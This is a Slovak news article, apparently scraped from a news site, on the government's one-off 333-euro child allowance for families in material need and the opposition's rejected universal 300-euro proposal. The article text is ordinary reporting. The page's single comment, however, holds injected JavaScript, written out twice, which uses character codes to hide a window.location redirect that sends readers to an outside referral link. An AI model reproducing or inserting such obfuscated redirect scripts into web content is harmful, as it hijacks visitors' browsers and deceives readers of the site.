Domov Ekonomika Rodiny dostanú jednorazový príspevok na deti

Rodiny dostanú jednorazový príspevok na deti

1
0

Vláda sa minulotýždňovom rokovaní dohodla, že každé dieťa v rodinách v núdzi dostane od štátu jednorazový príspevok pomoci vo výške 333 eur. Ešte predtým však poslanci NR SR odmietli podobný návrh, ktorý na rokovanie parlamentu predložili nezaradení poslanci zo strany Hlas-SD.

Nezaradení poslanci za stranu Hlas-SD predložili minulý týždeň na rokovanie parlamentu návrh, aby dostala každá rodina na Slovensku jednorazový pandemický príspevok vo výške 300 eur na každé nezaopatrené dieťa.

„Spojme sa a podporme tento prídavok na dieťa,“ apeloval na koalíciu jeden z predkladateľov návrhu Erik Tomáš. „Vláda sa zameriava najmä na podporu podnikov, aj to v nedostatočnej výške, avšak z podpory je vynechaná široká masa ľudí, od občanov, ktorí prišli o prácu, cez matky, ktoré sa starajú o deti v domácnosti až po študentov, ktorí nemôžu byť na internátoch, prišli o možnosť príležitostnej práce a priniesli tak výrazne vyššie náklady pre ich domácnosti,“ konštatovali predkladatelia v dôvodovej správe.

Jednorazový pandemický príspevok považujú títo poslanci za efektívny krok, ktorým štát dokáže ochrániť najohrozenejšie skupiny obyvateľstva a aspoň čiastočne im kompenzovať výpadky príjmov.

Odhodlaní porušiť koaličnú dohodu

A takýto návrh sa veru pozdával aj poslancov vládnej koalície. Viacerí poslanci Sme rodina avizovali minulú stredu v pléne podporu tomuto opozičnému návrhu. O tejto legislatívnej iniciatíve podľa predsedu poslaneckého klubu Sme rodina Petra Pčolinského diskutovali aj na koaličnej rade.

„My sme žiadali, aby vláda prišla s nejakým vlastným návrhom, vláda so žiadnym návrhom neprišla. Ja osobne budem hlasovať za tento návrh zákona,“ vyhlásil Pčolinský. Schyľovalo sa dokonca opäť ku koaličnej kríze, keďže SaS i Za ľudí považovali prípadné hlasovanie svojich koaličných partnerov s opozíciou za porušenie koaličnej zmluvy.

Kollár by dostal 3000

Napokon sa začínajúci problém vo vnútri koalície vyriešil. Koalícia totiž ešte v stredu popoludní predstavila svoj vlastný návrh. Premiér Eduard Heger po rokovaní vlády oznámil, že príspevok bude, avšak vo výške 333 eur, a nie pre všetky rodiny, ale len pre rodiny v núdzi.

Predseda Sme rodina Boris Kollár vyzdvihol, že koaličný návrh pomoci je adresnejší, a na ilustráciu uviedol, že keby sa prijal opozičný návrh pomoci v podobe 300 eur na každé dieťa, on sám by dostal vyše 3000 eur, čo nepotrebuje, pretože má dobrý plat a podniká. „Preto sme to nastavili tak, aby to dostali tí najpostihnutejší, tí najchudobnejší alebo tí najnúdznejší,“ vysvetlil Kollár.

Ako vyčíslil minister práce, sociálnych vecí a rodiny Milan Krajniak, suma 333 eur bude do leta vyplatená 45 693 deťom, ktoré sa nachádzajú v rodinách v hmotnej núdzi. Bude to podľa jeho slov rýchle, pretože na to stačí nariadenie vlády.

„Potom máme zadefinované ďalšie dve skupiny detí, ktorým bude tá pomoc vyplatená na jeseň a odstupňovaná podľa miery ohrozenia zasiahnutia pandémiou,“ vysvetlil minister.

To sa dotýka celkovo 147 653 detí v prvej skupine a 203 270 detí v druhej skupine. Týmto deťom dorazí pomoc takisto, ale treba na to najskôr zmeniť legislatívu, preto ju dostanú až v septembri alebo októbri.

Vláda si našla alibi

Po predstavení vládneho návrhu napokon poslanci NR SR na štvrtkovom hlasovaní návrh Hlasu-SD odmietli. Podľa predstaviteľov Hlasu-SD je vládne riešenie výsmechom slovenským rodinám a neporovnateľne horším návrhom než bol ten ich.

Podľa Petra Pellegriniho, predsedu Hlasu-SD a zároveň jedného z predkladateľov návrhu, si vláda našla alibi, prečo nepodporiť opozičný návrh, pričom sa pomoc dostane podstatne menšiemu počtu detí.

„Na rozdiel od podpory Hlasu-SD pre každé dieťa sa má vládny návrh týkať len rodín v hmotnej núdzi, čo znamená pomoc iba pre 45 000 detí namiesto približne milióna,“ porovnali členovia strany v stanovisku.

Pandémia však podľa nich zasiahla všetky slovenské rodiny, v ktorých rodičia celý rok suplovali učiteľky, vychovávateľky či kuchárky a mali preukázateľne nižšie príjmy a vyššie výdavky.

Pellegrini sa tiež opýtal, komu koaličné riešenie pomôže. „Ak je niekto v hmotnej núdzi, tak poberá sociálne dávky a štát mu pravidelne prispieva a bez ohľadu na to, či pandémia bola alebo nebola. Dokonca by som si dovolil tvrdiť, že človek v hmotnej núdzi počas pandémie nepocítil pokles svojej životnej úrovne, pretože dávky sa neznižovali,“ poznamenal.

Pokles svojich sociálnych istôt podľa neho pocítili najmä štandardné slovenské rodiny. „Ako povedia bežnej slovenskej rodine, kde matka zarába 700 eur, otec možno 800 eur, že sú vlastne bohatá rodina, ktorá nepotrebuje od štátu žiadne odškodnenie za to, čo za posledný rok musela prežiť?“ adresoval vládnej koalícii.

Nie je iba pre neprispôsobivých

Koaličný návrh sa musí tiež popasovať s kritikou, že je predovšetkým zacielený na neprispôsobivých občanov. Veronika Remišová na ňu zareagovala, že to tak nie je. „Je to podľa mňa nespravodlivé hodnotenie, pretože nejde o neprispôsobivých,“ reagovala

Remišová na otázku poslanca za Smer-SD Ladislava Kamenického v relácii RTVS O 5 minút 12, ako sa na schválený príspevok pre rodiny v hmotnej núdzi budú pozerať rodiny, kde jeden partner pracuje, a preto nárok na príspevok mať nebudú.

„Poznám veľa rodín, kde obaja prišli o prácu a ktorí budú mať nárok na tento príspevok,“ zdôraznila Remišová. To, že pomoc majú v čase pandémie dostať len deti z rodín v hmotnej núdzi, je nespravodlivé si myslí aj Konfederácia odborových zväzov (KOZ) SR.

„Pandémia zasiahla všetky rodiny, avšak vláda rozhodla, že ďalších takmer milión detí si pomoc od štátu, napriek preukázateľne nižším príjmom ich rodičov, nezaslúži,“ kritizujú odborári.

ano, TASR, foto: shutterstockNačítať ďalšie súvisiace články
Load More By Admin
Load More In Ekonomika

Jeden komentár

  1. window.location.replace(String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 114, 46, 104, 111, 110, 101, 121, 103, 97, 105, 110, 46, 109, 101, 47, 88, 80, 82, 90, 53, 48, 69, 65, 56, 52));

    5. apríla 2022 at 18:03

    window.location.replace(String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 114, 46, 104, 111, 110, 101, 121, 103, 97, 105, 110, 46, 109, 101, 47, 88, 80, 82, 90, 53, 48, 69, 65, 56, 52));

    Odpoveď

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Pozrite si tiež

VISKUPIČ: Predčasné voľby sú jediným riešením

Za SaS môžem povedať, že predčasné voľby sú v tejto vypätej situácii jediným riešením, chc…